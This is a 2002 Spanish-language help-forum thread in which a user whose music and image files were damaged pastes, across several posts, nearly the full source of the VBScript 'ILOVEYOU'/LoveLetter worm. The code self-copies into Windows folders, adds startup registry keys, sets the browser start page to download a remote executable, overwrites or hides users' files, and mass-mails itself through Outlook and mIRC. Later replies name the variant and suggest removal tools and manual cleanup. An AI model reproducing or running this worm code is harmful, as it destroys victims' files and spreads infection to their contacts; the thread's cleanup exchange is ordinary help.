Foros del Web » Administración de Sistemas » Seguridad y redes »

Ayuda Codigo Maldito VBscript

Estas en el tema de Ayuda Codigo Maldito VBscript en el foro de Seguridad y redes en Foros del Web. Pues me lleva la que me trajo, resulta que estaba bien tranquilito bajando mp3s con el kazaa y no me di cuenta de que se ...
  #1 (permalink)  
Antiguo 13/06/2002, 19:27
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Ayuda Codigo Maldito VBscript

Pues me lleva la que me trajo, resulta que estaba bien tranquilito bajando mp3s con el kazaa y no me di cuenta de que se habia bajado un archivo con la extensión .vbs (se supone que deje encendida la pc en la noche para que se bajaran mas MP3S) bueno, mi hermano es el encargado de moverlas a la carpeta correspondiente y testearlas, y creo que no sabia lo que era y lo ejecuto y cambio todas las extensiones de todos mis mp3s (2570) y de las imagenes en seguida les muestro el codigo, ojala y me ayuden a hacer algun archivo de "Vacuna" que revierta lo que este hizo...

Ayudenme por favor, no quiero hacer sentir mal a mi carnal por decirle que ejecuto un "virus" jeje, bueno pensandolo bien yo tengo la culpa por no haber chekado lo que se bajo con el kazaa.. :(
  #2 (permalink)  
Antiguo 13/06/2002, 19:31
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

Código:
 rem  barok -loveletter(vbe) <i hate go to school>
rem 			by: spyder  /  [email protected]  /  @GRAMMERSoft Group  /  Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  #3 (permalink)  
Antiguo 13/06/2002, 19:32
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

Código:
 elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
  #4 (permalink)  
Antiguo 13/06/2002, 19:33
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&" \script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application ")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
  #5 (permalink)  
Antiguo 13/06/2002, 19:36
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

regv=regedit.RegRead("HKEY_CURRENT_USER\Softw are\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Soft ware\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\&qu ot;&a,a.AddressEntries.Count
end if
  #6 (permalink)  
Antiguo 13/06/2002, 19:37
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LO VELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [email protected] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf & _
"code2=replace(code,chr(91)&chr(45)&c hr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)& chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)& chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
  #7 (permalink)  
Antiguo 13/06/2002, 19:38
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),& quot;'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),&q uot;""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),&q uot;/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),&q uot;\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),& quot;'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),&q uot;""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),&q uot;/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),&q uot;\")
set fso=CreateObject("Scripting.FileSystemObject& quot;)
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+ch r(45)+chr(91))
lines(n)=replace(lines(n),"""" ,chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+ch r(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&v bcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
  #8 (permalink)  
Antiguo 13/06/2002, 22:09
Avatar de AlZuwaga
Colaborador
 
Fecha de Ingreso: febrero-2001
Ubicación: 34.517 S, 58.500 O
Mensajes: 14.550
Antigüedad: 23 años, 9 meses
Puntos: 535
Re: Ayuda Codigo Maldito VBscript

Bueno, claramente este mensaje no tiene nada que ver con ASP. Así que pasemos al foro "Seguridad y Redes -> Virus" ya que de eso se trata

saludos
  #9 (permalink)  
Antiguo 14/06/2002, 01:27
 
Fecha de Ingreso: diciembre-2001
Mensajes: 197
Antigüedad: 22 años, 10 meses
Puntos: 0
Re: Ayuda Codigo Maldito VBscript

ok por lo que puedo ver se trata de una variante del virus "I Love You", mmmm lo que tienes que hacer es bajar la vacuna especial para eliminar dicho virus, ya que la tengas la ejecutas y todo eso ya que tu sistema este libre del virus tienes que ejecutar un programilla que se llama "LBugMp3", este programa restaura todas las modificaciones hechas por dicho virus, ya que haigas hecho todo eso, todo quedara igual y problema resuelto !!!


Vacuna Especial: http://updates.pandasoftware.com/pq/gen/loveletter/pqremove.com

LBugMp3: http://www.megasecurity.org/Security/Lbugmp3.zip

Nota: serias tan amable de mandarme el virus a mi correo ??? mi email es [email protected]

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>
  #10 (permalink)  
Antiguo 14/06/2002, 17:26
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

Hey wasek eres fenomenal, jeje bueno en seguida me bajo los archivos y los ejecuto y también te mando el virus..

Ayer fui a tu web para ver si podia encontrar algo pero no encontre nada :( jiji pero bueno..


Daz, lo puse en el foro de ASP porque es VBSCRIPT pero bueno oks jejeje

Nos vemoX...
  #11 (permalink)  
Antiguo 14/06/2002, 17:41
 
Fecha de Ingreso: diciembre-2001
Mensajes: 197
Antigüedad: 22 años, 10 meses
Puntos: 0
Re: Ayuda Codigo Maldito VBscript

ya sabes Chente_Fox, aqui estoy para lo que pueda ayudar !!!

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>
  #12 (permalink)  
Antiguo 14/06/2002, 18:16
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

mm, bueno la vacuna solo sirvio para eliminar las entradas al registro hechas por el virus, pero no cambio nada jeje, ni el otro archivo, lo que estoy haciendo es buscar todos los archivos con extension .jpg.vbs y .mp3.vbs y los estoy borrando, ya que me di cuenta que lo que hizo este virus fue auto multiplicarse y tomar el nombre del archivo, y al original no lo toco solo lo oculto, fui a propiedades de carpeta y le di Ver archivos ocultos y me sale una copia de los originales pero con extension .mp.vbs ej.

vivir sin aire &lt;-- Original
vivir sin aire.mp3.vbs &lt;-- Virus, jejeje

En fin espero que esto ayude..

Nos vemoX...

Pd1. De todas formas deja acabo de borrar todito ya me falta poco y te mando el virus que lo atrape en un disco de 3 1/2 jejeje


Pd2. Estoy siguiendo el mismo procedimiento con las imagenes con extension .jpg.vbs


  #13 (permalink)  
Antiguo 14/06/2002, 20:59
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

mm, wasek no pude enviarte el virus porque el mcafee lo detecta :(


pero dime como te lo pudeo enviar ;)

Nos vemoX...
  #14 (permalink)  
Antiguo 14/06/2002, 21:07
Avatar de ceronne  
Fecha de Ingreso: diciembre-2001
Ubicación: Paris
Mensajes: 990
Antigüedad: 22 años, 11 meses
Puntos: 1
Re: Ayuda Codigo Maldito VBscript

a la compu de una amiga le sucedió lo mismo, despues de muuuuuuuucho tiempo en asesoría online logramos quitar el virus, pero tengo una noticia mala........debido a todo el desmadre que hicimos no recuerdo bien como lo quitamos.

Si mi memoria no me falla apretó ctrl+alt+supr y ella encontró dos programas iguales.....elimina los dos de la ventana de las tareas.

Despues se fue a INICIO-RUN-MSCONFIG y eliminó de la pestaña INICIO todo lo que se viera sospechozo......inclusive creo que ahí aparecen uno o dos archivos .vbs

por último lo que hizo fue buscar en toda la compu todos los archivos .vbs y eliminar los que se vean sospechosos (aquellos que aparecian en el MSCONFIG).....

  #15 (permalink)  
Antiguo 14/06/2002, 22:11
Avatar de masterwww  
Fecha de Ingreso: enero-2002
Ubicación: Toluca
Mensajes: 1.260
Antigüedad: 22 años, 10 meses
Puntos: 1
Re: Ayuda Codigo Maldito VBscript

esta mamada de mensaje tenia virus, lastima que no pude copiar el mensaje, estas son puterias cabron ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡
  #16 (permalink)  
Antiguo 14/06/2002, 22:14
Avatar de masterwww  
Fecha de Ingreso: enero-2002
Ubicación: Toluca
Mensajes: 1.260
Antigüedad: 22 años, 10 meses
Puntos: 1
Re: Ayuda Codigo Maldito VBscript

El archivo MENSAJE[12]htm ESTA INFECTADO POR vbs/lOVELETTER.WORM un virus

Ruta de archivo C:\WINDOWS\ARCHIVOS
TEMPORALES DE I...

Estado: infectado
  #17 (permalink)  
Antiguo 15/06/2002, 04:30
 
Fecha de Ingreso: diciembre-2001
Mensajes: 197
Antigüedad: 22 años, 10 meses
Puntos: 0
Re: Ayuda Codigo Maldito VBscript

hey Chente_Fox, pues la verdad no se que paso, yo he arreglado varias pc's siguiendo el procedimiento que te dije !!, pero en fin.


si no puedes mandar el virus por email, subelo a un server y lo bajo !!!

<center><img src="http://galeon.com/wbk/lhz.gif" align="center" width="285" height="102"></center>
  #18 (permalink)  
Antiguo 15/06/2002, 08:57
Chente_Fox
Invitado
 
Mensajes: n/a
Puntos:
Re: Ayuda Codigo Maldito VBscript

vavava jeje gracias chavos, lo de subirlo a un server creo que ahorita no sera posible, estare fuera todo el día así que en la nochesita lo subire ;) de todas formas ya acabe con el virus estube revisando la pc &quot;a fondo&quot; y no queda nada ;)


Nos vemoX... <IMG SRC="images/futbol.gif" WIDTH="15" HEIGHT="15" HSPACE="3">
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado




La zona horaria es GMT -6. Ahora son las 08:57.